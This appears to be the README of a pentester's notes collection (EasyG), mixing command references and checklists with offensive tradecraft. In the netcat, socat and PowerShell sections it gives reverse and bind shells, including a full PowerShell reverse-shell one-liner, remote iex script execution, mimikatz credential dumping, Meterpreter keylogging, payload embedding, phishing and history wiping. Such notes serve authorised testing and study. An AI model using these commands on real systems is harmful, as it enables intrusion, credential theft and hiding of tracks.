███████╗ █████╗ ███████╗██╗ ██╗ ██████╗
██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔════╝
█████╗ ███████║███████╗ ╚████╔╝ ██║ ███╗
██╔══╝ ██╔══██║╚════██║ ╚██╔╝ ██║ ██║
███████╗██║ ██║███████║ ██║ ╚██████╔╝
╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝
Made with <3 by Riccardo Malatesta (@seeu)
EasyG started out as a script that I use to automate some information gathering tasks for my hacking process, you can find it here. Now it's more than that. Here I gather all the resources about hacking that I find interesting: notes, payloads, tools and more.
I try as much as possible to link to the various sources or inspiration for these notes. A large part of these notes are from: PTS v4, PortSwigger Web Security Academy, PEN-200, TryHackMe, Jhaddix, The Cyber Mentor, NahamSec (and NahamCon), InfoSec Twitter and many other amazing people.
- Resources
- Useful tips
- Check-lists
- Linux
- Tools
- Passive Information Gathering (OSINT)
- Active Information Gathering
- Content Discovery
- Networking
- Source code review
- Vulnerability Scanning
- Web vulnerabilities
- SQL Injection
- Authentication vulnerabilities
- Directory Traversal
- File inclusion
- OS Command Injection
- Business logic vulnerabilities
- Information Disclosure
- Access control vulnerabilities and privilege escalation
- File upload vulnerabilities
- Server-side request forgery (SSRF)
- Open redirection
- XXE injection
- Cross-site scripting (XSS)
- Cross-site request forgery (CSRF)
- Cross-origin resource sharing (CORS)
- Clickjacking
- DOM-based vulnerabilities
- WebSockets
- Insecure deserialization
- Server-side template injection
- Web cache poisoning
- HTTP Host header attacks
- HTTP request smuggling
- OAuth authentication
- JWT Attacks
- GraphQL
- WordPress
- IIS - Internet Information Services
- Lotus Domino
- Git source code exposure
- Subdomain takeover
- 4** Bypass
- Application level Denial of Service
- APIs attacks
- Grafana attacks
- Confluence attacks
- Client-Side Attacks
- Thick client vulnerabilities
- DLL Hijacking
- Insecure application design
- Weak Hashing Algorithms
- Cleartext secrets in memory
- Hardcoded secrets
- Unsigned binaries
- Lack of verification of the server certificate
- Insecure SSL/TLS configuration
- Remote Code Execution via Citrix Escape
- Direct database access
- Insecure Windows Service permissions
- Code injection
- Windows persistence
- System Attacks
- Mobile
- Cloud hacking
- Artificial intelligence vulnerabilities
Blogs
Reports
News
Newsletter
- Bug Bytes
- Executive Offense
- The Unsupervised Learning Newsletter
- Executive Offense
- TLDR Newsletter
- Hive Five - securibee
- Vulnerable U
- The Security, Funded Newsletter
- For RCE
- Never upload a shell at first, you can be banned from a program. Just execute a
whoami
as a PoC, proceed with a shell if required/allowed.
- Never upload a shell at first, you can be banned from a program. Just execute a
- For stored XSS
console.log()
is better thanalert()
, it makes less noise especially for stored XSS.
- For SQLi
- Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor infos. Proceed with db dump only if required/allowed;
- Don't use tautologies like
OR 1=1
, it can end up in a delete query or something dangerous. It's better to useAND SLEEP(5)
orte'+'st
.
- For subdomain takeovers
- use as a PoC an html page like:
9a69e2677c39cdae365b49beeac8e059.html<!-- PoC by seeu -->
- use as a PoC an html page like:
- For Metasploit: the port
4444
is very common with Metasploit, so this can trigger some warnings. Consider using another port if the exploit doesn't work.
Shells
- Shell: we open a shell on the client
- Reverse shell: we make the victim connect to us with a shell
- Attacker:
nc -lvp 4444
- Victim:
nc <ip_attacker> 4444 -e /bin/sh
- Attacker:
- Bind shell: the victim has a listener running and the attacker connects to it in order to get a shell
- Attacker:
nc <ip_victim> 4444
- Victim:
nc -lvp 4444 -e /bin/sh
- Attacker:
Payloads
- Staged: Sends payload in stages, can be less stable
- example:
windows/meterpreter/reverse_tcp
- example:
- Non-staged: Sends exploit all at once, larger in size and won't always work
- example:
windows/meterpreter_reverse_tcp
- example:
- HIPAA, a framework that governs medical data in the US
- PCI, a framework that governs credit card and payment processing
- GDPR, a Regulation in EU law on data protection and privacy in the EU and the European Economic Area
- SMB-Checklist
- Win32 Offensive Cheatsheet
- Regexp Security Cheatsheet
- Cheat-Sheet - Active-Directory
- Security Testing of Thick Client Application
- OWASP Cheat Sheet Series
- OSSTMM
- MindMaps
- EasyG and all the connected tools
- Burp Suite and all the extensions
- Kali Linux since it has everything you need
See The Bug Hunter's Methodology v4.0 - Recon Edition by @jhaddix #NahamCon2020!
- Integrations
- Application Libraries (usually JavaScript)
- Application: Custom Code or COTS
- Application Framework
- Web Hosting Software (Default creds, Web server misconfigurations, web exploits)
- Open Ports and Services (Default creds on services, service level exploits)
- Passive Information Gathering (OSINT)
- Location information
- Satellite images
- Drone recon
- Bulding layout
- Target validation
- User Information Gathering
- Job Information
- Employees
- Pictures
- Job Information
- Active Information Gathering
- Finding subdomains
- Fingerprinting
- Content Discovery
- Vulnerability Scanning
- Penetration
- Initial Foothold
- Privilege Escalation
- Lateral Movement
- Maintaining access (Trojans)
- Cleaning up rootkits
- Covering tracks
- Reporting / Analysis
- Lessons Learned / Remediation
- Setup the environment
- Create a dedicated folder
- Create files like
creds.txt
andcomputers.txt
- Check that the targets are valid and owned by client
- Start a port scanning
sudo nmap -sC -sV -oN nmap_results <IP> -vvv
rustscan <IP>
- Search for CVEs and exploits for the identified services
- If there is a web server present
- Use
whatweb <target>
to gain more information about the technology- search for CVEs and exploits
- search for
robots.txt
,.svn
,.DS_STORE
,README.md
- Run a directory research
dirsearch -u <target> -x 404 -e *
dirsearch -u <target> -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php
gobuster dir -u <target> -w /usr/share/wordlists/dirb/common.txt -o results -x txt,pdf,config
gobuster dir -u <target> -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o results
dirbrute
and/usr/share/wordlists/dirb/common.txt
- See the source code
- Run
nikto
andnuclei
- Use
- If there is a ftp service present
- test default credentials / anonymous login
- search for CVEs and exploits
- If there is a smb service present
- run
nmap -vvv -p 139,445 --script=smb* <IP>
- test default credentials / anonymous login
- search for CVEs and exploits
- run
- Exploit the machine
- Example: exploit a Directory Traversal in a Web Application to gain
/etc/passwd
or SSH private keys, likeid_rsa
orid_ecdsa
- Example: exploit a Directory Traversal in a Web Application to gain
- Use what you found to access the machine
- Example: crack the password of
id_rsa
withssh2john id_rsa > ssh.hash
andjohn --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
, then gain access withssh -i id_rsa <username>@<IP>
- Example: crack the password of
- Elevate your privileges
- Run
PowerUp.ps1
Invoke-AllChecks
in Windows - Run winPEAS or linPEAS, note:
- System information
- Network interfaces, Known hosts, and DNS Cache
- Check what high privilege commands can be run
- Config files, clear text passwords, connections strings etc.
- AV Information
- Any information about applications used
- Any other interesting file / info
- Define all potential privilege escalation vectors
- Use GTFOBins
- Run
- Password attack: test the credentials found to gain more accesses
crackmapexec <service> <IP> -u usernames.txt -p passwords.txt --continue-on-success
crackmapexec <service> <IP> -u administrator -H <NTLM> --continue-on-success
crackmapexec <service> <IP> -u administrator -H <NTLM> --local-auth --lsa
- Explore the services found
- Example: enumerate SMB shares with
crackmapexec smb <IP> -u <user> -p <password> --shares
- Example: enumerate SMB shares with
- Client-side attack
- Perform a Phishing attack
- Run WebDAV and prepare the Windows Library and shortcut files
- Send an email with
sudo swaks -t <recipient> -t <recipient> --from <sender> --attach @<Windows-Library-file> --server <IP> --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
- If you have more information, you could leverage Microsoft Office or Windows Library Files
- Perform a Phishing attack
- Once an access to an internal network machine is gained, use again winPEAS or linPEAS
- See step
2.3.
- In Windows, verify the OS with
systeminfo
(winPEAS may falsely detect Windows 11 as Windows 10) - Gain situational awareness
- See step
- Create a file
computers.txt
to document identified internal machines and additional information about them - Check for Password Manager files, like
*.kdbx
- In Windows, enumerate the AD environment and its objects
- Use
SharpHound.ps1
andBloodHound
- Use
- set up a SOCKS5 proxy to perform network enumeration via Nmap and CrackMapExec
- search for accessible services, open ports, and SMB settings
- Use credentials found to log in
- Find potential exploits
- See step
1.3.
- Use the Web Application to gain a shell as
NT AUTHORITY\SYSTEM
- Cached Credentials
- If there is no AV, consider upgrading the shell to Meterpreter for more advantages
- Use mimikatz for this pupose
- Run
privilege::debug
andsekurlsa::logonpasswords
- Run
- Lateral Movement
- leverage the domain admin privileges of one of the account found to get access to the domain controller
- Run EasyG assetenum
- Select the interesting targets
- Pass the subdomains to Burp Suite
- Open them in Firefox
- Check for mobile/desktop applications
- If there are any other non-web application, use Apkleak and Source2Url (even if OoS)
- If every asset is in scope
- Recon
- Explore the app, see and every functionality (eventually, search for documentation)
- Crawl with Burp Suite
- Collect endpoints with BurpJSLinkFinder
- Content Discovery, use tools, Google Dorking and GitHub Dorking
- Check the Testing layers
- Authentication
- See Authentication vulnerabilities
- Account Section
- Upload Functions
- Email functions, check if you can send emails from the target
- Spoofing
- HTML Injection
- XSS
- Feedback functions
- Look for Blind XSS
- Broken Access Control, IDOR & co
- Content Types
- Look for multipart-forms
- Look for content type XML
- Look for content type json
- APIs
- Methods
- API Security Checklist
- Errors
- Change POST to GET
- OWASP Cheat Sheet Series, check also
- Look at the index of this repo and see if you've missed anything interesting
Note: a lot of these commands are from RTFM: Red Team Field Manual by Ben Clark and from PEN-200: Penetration Testing with Kali Linux by Offensive Security.
Linux Services and Networking
netstat -tulpn Show Linux network ports with process ID’s (PIDs)
watch ss -stplu Watch TCP, UDP open ports in real time with socket summary
lsof -i Show established connections
macchanger -m MACADDR INTR Change MAC address on KALI Linux
ifconfig eth0 192.168.2.1/24 Set IP address in Linux
ifconfig eth0:1 192.168.2.3/24 Add IP address to existing network interface in Linux
ifconfig eth0 hw ether MACADDR Change MAC address in Linux using ifconfig
ifconfig eth0 mtu 1500 Change MTU size Linux using ifconfig, change 1500 to your desired MTU
dig -x 192.168.1.1 Dig reverse lookup on an IP address
host 192.168.1.1 Reverse lookup on an IP address, in case dig is not installed
dig @192.168.2.2 domain.com -t AXFR Perform a DNS zone transfer using dig
host -l domain.com nameserver Perform a DNS zone transfer using host
nbtstat -A x.x.x.x Get hostname for IP address
ip addr add 192.168.2.22/24 dev eth0 Adds a hidden IP address to Linux, does not show up when performing an ifconfig
tcpkill -9 host google.com Blocks access to google.com from the host machine
echo \"1\" > /proc/sys/net/ipv4/ip_forward Enables IP forwarding, turns Linux box into a router – handy for routing traffic through a box
echo \"8.8.8.8\" > /etc/resolv.conf Use Google DNS
sudo systemctl start ssh Start the SSH service in Kali
sudo ss -antlp | grep sshd Confirm that SSH has been started and is running
sudo systemctl enable ssh Configure SSH to start at boot time
sudo systemctl start apache2 Start the apache service in Kali
sudo ss -antlp | grep apache Confirm that apache has been started and is running
sudo systemctl enable apache2 Enable apache to start at boot time
systemctl list-unit-files Display all available services
ps -fe Common ps syntax to list all the processes currently running; f: display full format listing (UID, PID, PPID, etc.), e: select all processes, C: select by command name
sudo tail -f /var/log/apache2/access.log Monitor the Apache log file using tail command
Linux User Management
whoami Shows currently logged in user on Linux
id Shows currently logged in user and groups for the user
last Shows last logged in users
mount Show mounted drives
df -h Shows disk usage in human readable output
echo \"user:passwd\" | chpasswd Reset password in one line
getent passwd List users on Linux
strings /usr/local/bin/blah Shows contents of none text files, e.g. whats in a binary
uname -ar Shows running kernel version
history Show bash history, commands the user has entered previously
Linux File Commands
df -h blah Display size of file / dir Linux
diff file1 file2 Compare / Show differences between two files on Linux
md5sum file Generate MD5SUM Linux
md5sum -c blah.iso.md5 Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir
file blah Find out the type of file on Linux, also displays if file is 32 or 64 bit
dos2unix Convert Windows line endings to Unix / Linux
base64 < input-file > output-file Base64 encodes input file and outputs a Base64 encoded file called output-file
base64 -d < input-file > output-file Base64 decodes input file and outputs a Base64 decoded file called output-file
touch -r ref-file new-file Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file
rm -rf Remove files and directories without prompting for confirmation
mkdir -p pt/{recon,exploit,report} This command will create a directory pt and inside of it the directories recon, exploit and report
ls /etc/apache2/wwwold/*.conf Display files with certain criteria
ls -a -a option is used to display all files
ls -1 Display each file in a single line
ls -l Shows detailed information about the files and directories in a directory
ls -la /usr/bin | grep zip Search for any file(s) in /usr/bin containing "zip"
pwd Print the current directory
cd ~ Return to the home/user directory
echo "test1" > test.txt Saves "test1" in the new file "test.txt"
echo "test2" >> test.txt Add in a new line "test2" in the file "test.txt"
echo "hack::the::world" | awk -F "::" '{print $1, $3}' Extr fields from a stream using a multi-character separator in awk
comm scan-a.txt scan-b.txt Compare files
diff -c scan-a.txt scan-b.txt Compare files, context format
diff -u scan-a.txt scan-b.txt Compare files, unified format
vimdiff scan-a.txt scan-b.txt Compare files using vim
Misc Commands
init 6 Reboot Linux from the command line
gcc -o output.c input.c Compile C code
gcc -m32 -o output.c input.c Cross compile C code, compile 32 bit binary on 64 bit Linux
unset HISTORYFILE Disable bash history logging
kill -9 $$ Kill current session
chown user:group blah Change owner of file or dir
chown -R user:group blah Change owner of file or dir and all underlying files / dirs – recersive chown
chmod 600 file Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details
ssh [email protected] | cat /dev/null > ~/.bash_history Clear bash history
man -k '^passwd$' See the documentation of a command. Use the flag -k for keyword research
man 5 passwd See the page 5 of the documentation
apropos descr See wich description from docs matches the input for apropos
locate sbd.exe Locate "sbd.exe"
sudo find / -name sbd* Perform recursive search starting from root file system directory and look for files that starts with "sbd"
which sbd Search in $PATH "sbd"
apt-cache search pure-ftpd Search for the pure-ftpd application
apt show resource-agents Examine information related to the resource-agents package
sudo apt install pure-ftpd apt install the pure-ftpd application
sudo apt remove --purge pure-ftpd apt remove –purge to completely remove the pure-ftpd application
sudo dpkg -i man-db_2.7.0.2-5_amd64.deb dpkg -i to install the man-db application
echo "I need to try hard" | sed 's/hard/harder/' Replac a word in the output stream
echo "Hack.The.World."| cut -f 3 -d "." Extract fields from the echo command output using cut
cut -d ":" -f 1 /etc/passwd Extract usernames from /etc/passwd using cut
wc -m < test.txt Feed the wc command with the < operator
cat test.txt | wc -m Pip the output of the cat command into wc
wget -O report_w.pdf https://of.io/report.pdf Download a file through wget
curl -o report_c.pdf https://of.io/report.pdf Download a file with curl
axel -a -n 20 -o report_a.pdf https://of.io/report.pdf Download a file with axel; -n: number of multiple connections to use, -a: more concise progress indicator, -o specify a different file name for the downloaded file
alias lsa='ls -la' Create an alias "lsa" to execute the command "ls -la"
alias mkdir='ping -c 1 localhost' Creat an alias that overrides the mkdir command
unalias mkdir Unsett an alias
cat ~/.bashrc Examin the ".bashrc" default file, the system-wide file for Bash settings located at "/etc/bash.bashrc"
chmod +x Make a file executable
xfreerdp /u:<user> /p:<password> /cert:ignore /v:<ip> Connect with RDP
rdesktop -u <user> -p <password> <ip> Connect with RDP
Linux environment variables
export vartest=8.8.8.8 Declare an environment variable
env See all declared environment variables
$$ Env var; Display the ID of the current shell instance
$PATH Env var; List of directories for the shell to locate executable files
PATH=$PATH:/my/new-path Add a new PATH, handy for local FS manipulation
$USER Env var; Current user
$PWD Env var; Current directory path
$HOME Env var; Home directory path
HISTCONTROL Env var; Defines whether or not to remove duplicate commands
export HISTCONTROL=ignoredups Remove duplicates from our bash history
export HISTIGNORE="&:ls:[bf]g:exit:history" Filter basic, common commands
export HISTTIMEFORMAT='%F %T ' Include the date/time in our bash history
Linux File System Permissions
777 rwxrwxrwx No restriction, global WRX any user can do anything
755 rwxr-xr-x Owner has full access, others can read and execute the file
700 rwx------ Owner has full access, no one else has access
666 rw-rw-rw- All users can read and write but not execute
644 rw-r--r-- Owner can read and write, everyone else can read
600 rw------- Owner can read and write, everyone else has no access
Linux Directories
/ / also know as “slash” or the root
/bin Common programs, shared by the system, the system administrator and the users
/boot Boot files, boot loader (grub), kernels, vmlinuz
/dev Contains references to system devices, files with special properties
/etc Important system config files
/home Home directories for system users
/lib Library files, includes files for all kinds of programs needed by the system and the users
/lost+found Files that were saved during failures are here
/mnt Standard mount point for external file systems
/media Mount point for external file systems (on some distros)
/net Standard mount point for entire remote file systems – nfs
/opt Typically contains extra and third party software
/proc A virtual file system containing information about system resources
/root root users home dir
/sbin Programs for use by the system and the system administrator
/tmp Temporary space for use by the system, cleaned upon reboot
/usr Programs, libraries, documentation etc. for all user-related programs
/var Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler, Web servers, Databases etc
Linux Interesting Files / Directories
/etc/passwd Contains local Linux users
/etc/shadow Contains local account password hashes
/etc/group Contains local account groups
/etc/init.d/ Contains service init script – worth a look to see whats installed
/etc/hostname System hostname
/etc/network/interfaces Network interfaces
/etc/resolv.conf System DNS servers
/etc/profile System environment variables
~/.ssh/ SSH keys
~/.bash_history Users bash history log
/var/log/ Linux system log files are typically stored here
/var/adm/ UNIX system log files are typically stored here
/var/log/apache2/access.log Apache access log file typical path
/var/log/httpd/access.log Apache access log file typical path
/etc/fstab File system mounts
Examples
- Search the /etc/passwd file for users with a shell set to /bin/false and prints the username and home directory of each user found:
cat /etc/passwd | awk -F: '{if ($7 == "/bin/false") print "The user " $1 " home directory is " $6}'
- Inspect Apache logs
- Get IPs in access.log, count the frequency and sort them:
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
- From the log file, pick one IP:
cat access.log | grep '108.38.224.98' | cut -d "\"" -f 2 | uniq -c
- Further inspect user's behavior:
cat access.log | grep '108.38.224.98' | grep '/admin ' | sort -u
- Get IPs in access.log, count the frequency and sort them:
- Mounting a Shared Folder on a Linux Computer
mount <NAS Ethernet Interface IP>:/share/<Shared Folder Name> <Directory to Mount>
EasyG is a script that I use to automate some information gathering tasks for my hacking process. It uses: amass, subfinder, github-subdomains, gobuster, anew, httprobe, naabu and nuclei. Install the necessary tools with install.bat or install.sh and then run ruby easyg.rb
.
- XSS all the things some payloads to find XSS in various places
- lists
- findtheevent.txt and findthetag.txt helps me test for XSS faster, created with the help of Cross-site scripting (XSS) cheat sheet
- scripts
- fg.rb a copy of tomnomnom/gf made in ruby
- paramspider_support.rb use paramspider with a list of targets as an input
- shells to test file uploads
- To add a domain + subdomains in advanced scopes:
^(.*\.)?test\.com$
- To fix visual glitches
- To add a new header
1. Go to Proxy -> Options -> Match and Replace -> Add 2. Change Type to Request Header 3. As the default text says in Match 'leave blank to add a new header' 4. Put the new header in Replace
- Analyze better the results from Intruder with Settings > "Grep - Extract"
- Manually select in the response the value that you want to track in a new column in the results
Cool extensions
- Turbo Intruder
- HTTP Request Smuggler
- Wsdler to interact with SOAP
- InQL
- Swagger-EZ
- BurpCustomizer
- Software Version Reporter
- Software Vulnerability Scanner
- IP Rotate
- Autorize
- BurpJSLinkFinder
- Anonymous Cloud
- Upload Scanner
- JWT Editor
- GetAllParams evolution
- Burp Bounty
Browser extensions
- Trufflehog Chrome Extension
- Wappalyzer
- DotGit
- Cookie-Editor
- Shodan for Chrome and for Firefox
- If you are using FireFox, you could use FoxyProxy
Misc Commands
nc -nv <IP> <port> Connect to a TCP port
nc -nlvp <port> Set up a listener
nc -nv <IP> <port> Connect to a listener
nc -nlvp <port> > incoming.exe Receive a file
nc -nv <IP> <port> < /usr/share/windows-resources/binaries/wget.exe Transfer a file
nc -nlvp <port> -e cmd.exe Set up a bind shell
nc -nv <IP> <port> -e /bin/bash Send a reverse shell
Port Scanning
nc -nvv -w 1 -z <IP> <PORT-RANGE> Use netcat to perform a TCP port scan
nc -nv -u -z -w 1 <IP> <PORT-RANGE> Use netcat to perform an UDP port scan
Misc Commands
socat - TCP4:<remote server's ip address>:80 Connect to a remote server on port 80
socat TCP4-LISTEN:<PORT> STDOUT Create a listener
socat -d -d TCP4-LISTEN:<PORT> STDOUT Create a listener, -d -d for more verbosity
socat TCP4-LISTEN:<PORT>,fork file:secret.txt Transfer a file
socat TCP4:<IP>:<PORT> file:received_secret.txt,create Receive a file
socat TCP4:<IP>:<PORT> EXEC:/bin/bash Send a reverse shell
socat OPENSSL-LISTEN:<PORT>,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash Create an encrypted bind shell
socat - OPENSSL:<IP>:<PORT>,verify=0 Connect to an encrypted bind shell
Reverse Shell
socat -d -d TCP4-LISTEN:<PORT> STDOUT User 1, create a listener
socat TCP4:<IP>:<PORT> EXEC:/bin/bash User 2, send reverse shell to User 1
Encrypted bind shell with OpenSSL
$ openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt
req: initiate a new certificate signing request
-newkey: generate a new private key
rsa:2048: use RSA encryption with a 2,048-bit key length.
-nodes: store the private key without passphrase protection
-keyout: save the key to a file
-x509: output a self-signed certificate instead of a certificate request
-days: set validity period in days
-out: save the certificate to a file
$ cat bind_shell.key bind_shell.crt > bind_shell.pem
$ sudo socat OPENSSL-LISTEN:<PORT>,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash Create an encrypted bind shell
$ socat - OPENSSL:<IP>:<PORT>,verify=0 Connect to the encrypted bind shell
Misc Commands
Set-ExecutionPolicy Unrestricted Set the PowerShell execution policy
Get-ExecutionPolicy Get value for ExecutionPolicy
(new-object System.Net.WebClient).DownloadFile('http://<IP>/<filename>','C:\<DIR>\<filename>') Download a file
iwr -uri http://<IP>/<filename> -Outfile <filename> Download a file
powershell -c "command" The -c option will execute the supplied command as if it were typed at the PowerShell prompt
Encode PowerShell from the command line
-
echo "iex(cmd)" | iconv -t UTF-16LE | base64 -w 0 | xclip -sel clip
Send a reverse shell with PowerShell
-
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
-
$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close();
Set up a bind shell with PowerShell
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
Powercat
Script: powercat.ps1.
powercat -c <IP> -p <PORT> -i C:\<DIR>\powercat.ps1 Send a file
powercat -c <IP> -p <PORT> -e cmd.exe Send a reverse shell
powercat -l -p 443 -e cmd.exe Set up a bind shell; -l option to create a listener, -p to specify the listening port number, -e to have an application executed once connected
powercat -c <IP> -p <PORT> -e cmd.exe -g > reverseshell.ps1 Create a stand-alone payload
powercat -c <IP> -p <PORT> -e cmd.exe -ge > encodedreverseshell.ps1 Create an encoded stand-alone payload with powercat
Load a remote PowerShell script using iex
iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
Execute an encoded stand-alone payload using PowerShell
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAHI...
Upload a file to an FTP server
$ftpRequest = [System.Net.FtpWebRequest]::Create("ftp://<IP>:<PORT>/<FILE_TO_UPLOAD>"); $ftpRequest.Credentials = New-Object System.Net.NetworkCredential("<USERNAME>", "<PASSWORD>"); $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile; $fileContents = [System.IO.File]::ReadAllBytes((Resolve-Path "<FILE_TO_UPLOAD>")); $ftpRequest.ContentLength = $fileContents.Length; $requestStream = $ftpRequest.GetRequestStream(); $requestStream.Write($fileContents, 0, $fileContents.Length); $requestStream.Close(); $response = $ftpRequest.GetResponse(); $response.Close()
- Change
<IP>
,<PORT>
,<FILE_TO_UPLOAD>
,<USERNAME>
,<PASSWORD>
Filters
net 10.10.1.0/24
, capture traffic only on the10.10.1.0/24
address range
Display filters
tcp.port == 21
, only display FTP data
Misc operations
-
Follow TCP stream:
Right-click
>Follow
>TCP Stream
tcpdump -r packets.pcap Read packet capture
tcpdump -n -r packets.pcap | awk -F" " '{print $3}' | sort | uniq -c | head Read and filter the packet capture;
-n option to skip DNS name lookups, -r to read from our packet capture file
awk to print the destination IP address and port, sort and uniq -c to sort and count the number of times the field appears in the capture, respectively, head to only display the first 10 lines of the output
tcpdump -n src host <IP> -r packets.pcap Tcpdump filters; src host to output only source traffic
tcpdump -n dst host <IP> -r packets.pcap Tcpdump filters; dst host to output only destination traffic
tcpdump -n port <PORT> -r packets.pcap Tcpdump filters; filter by port number
tcpdump -nX -r packets.pcap -X to print packet data in both HEX and ASCII format
Advanced Header Filtering: display only the data packets
- Look for packets that have the
PSH
andACK
flags turned on- The
ACK
flag will be set for all packets sent and received after the initial 3-way handshake - In interactive Application Layer protocols, the
PSH
flag is frequently used to guarantee rapid delivery of a packet and prevent buffering.
- The
- TCP flags are defined starting from the 14th byte
ACK
andPSH
are represented by the fourth and fifth bits of the 14th byte- Turning on these bits would result in
00011000
=24
in decimal, verify it withecho "$((2#00011000))"
- To display packets that have the ACK or PSH flags set:
sudo tcpdump -A -n 'tcp[13] = 24' -r packets.pcap
- Grep all the subdomains for
target.com
fromindex.html
:grep -o '[^/]*\.target\.com' index.html | sort -u > list.txt
- Get the IPs from list.txt:
for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u
sudo systemctl start postgresql start postgresql manually
sudo systemctl enable postgresql start postgresql at boot
sudo msfdb init create the Metasploit database
sudo apt update; sudo apt install metasploit-framework update the Metasploit Framework
sudo msfconsole -q start the Metasploit Framework
show -h help flag
show auxiliary list all auxiliary modules
search type:auxiliary name:smb search for SMB auxiliary modules
back move out of the current context and return to the main msf5 prompt
previous switch us back to the previously selected module
services display the metasploit database logs; -p: filter by port number; -s: service name; -h: help command
hosts show discovered hosts
db_nmap <IP> -A -Pn performing a Nmap scan from within Metasploit
workspace list workspaces; -a: add a workspace, -d: delete a workspace
sessions -l list all sessions; -i: to interact with a session
transport list list the currently available transports for the meterpreter connection
To interact with a module
info
request more info about the moduleshow options
most modules require options- Use
set
andunset
to configure the options - Use
setg
andunsetg
to configure global options show payloads
list all payloads that are compatible with the current exploit modulecheck
check if the target is vulnerablerun
orexploit
to run the exploit-j
use as background jobjobs
list background jobskill
kill job
windows/shell_reverse_tcp
- Connect back to attacker and spawn a command shellwindows/shell/reverse_tcp
- Connect back to attacker, Spawn cmd shell (staged)- Useful, for example, if the vulnerability you need to exploit doesn't have enough buffer space to hold a full payload
upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\tidus
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
shell
get the shell
generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
embedding the payload in plink.exe from within msfconsole- Use the framework
multi/handler
to catch standard reverse shells- Works for all single and multi-stage payloads
- Specify the incoming payload type
screenshot take a screenshot of the compromised host desktop
keyscan_start start the keystroke sniffer
keyscan_dump dump captured keystrokes
keyscan_stop stop the keystroke sniffer
Migrate your meterpreter process
ps
view all running processes and then pick onemigrate <PID>
migrate the process to a target PID
Use mimikatz from meterpreter
load kiwi
run the extension kiwigetsystem
acquire SYSTEM privilegescreds_msv
dump the system credentials
Port forwarding
meterpreter> portfwd -h
- Example
portfwd add -l 3389 -p 3389 -r 192.168.1.121
- Example
For a temporary server
python -m SimpleHTTPServer 7331
python3 -m http.server 7331
php -S 0.0.0.0:8000
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000
For a temporary public server
For a temporary FTP server
- Host:
python -m pyftpdlib -w
- Client:
ftp open <IP> 2121 anonymous
For auths
- textverified.com for auths requiring a phone number
- temp-mail.org
To find parameters
- Arjun detection of the parameters present in the application
- ParamSpider
Asset enumeration/discovery
- amass
amass enum -brute -active -d target -o output/target.txt -v
- subfinder
subfinder -d target -all -o output/target_subfinder.txt"
- github-subdomains
- bgp.he.net to find ASN +
amass intel -asn <ASN>
- crt.sh
- Crtsh-Fetcher
- To find new domains
cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt
- gobuster + all.txt by jhaddix
- dnsx
- Reverse DNS lookup
cat ip.txt | dnsx -ptr -resp-only
- Reverse DNS lookup
- VhostScan to discover virtual hosts
- gip a command-line tool and Rust library to check global IP address.
- anew to add only new subdomains
- httpx
type scope.txt | httpx -sc -mc 404
find404
pages
- urless
- hakcheckurl
python3 urless.py -i urls.txt | hakcheckurl | grep -v 404
Exploits
- SearchSploit
searchsploit afd windows -w -t
;-w
to return the URL for https://www.exploitdb.com,-t
to search the exploit title
- Packet Storm
- BugTraq
- National Vulnerability Database
- Browser Exploitation Framework (BeEF)
- PoC in GitHub
For Reporting
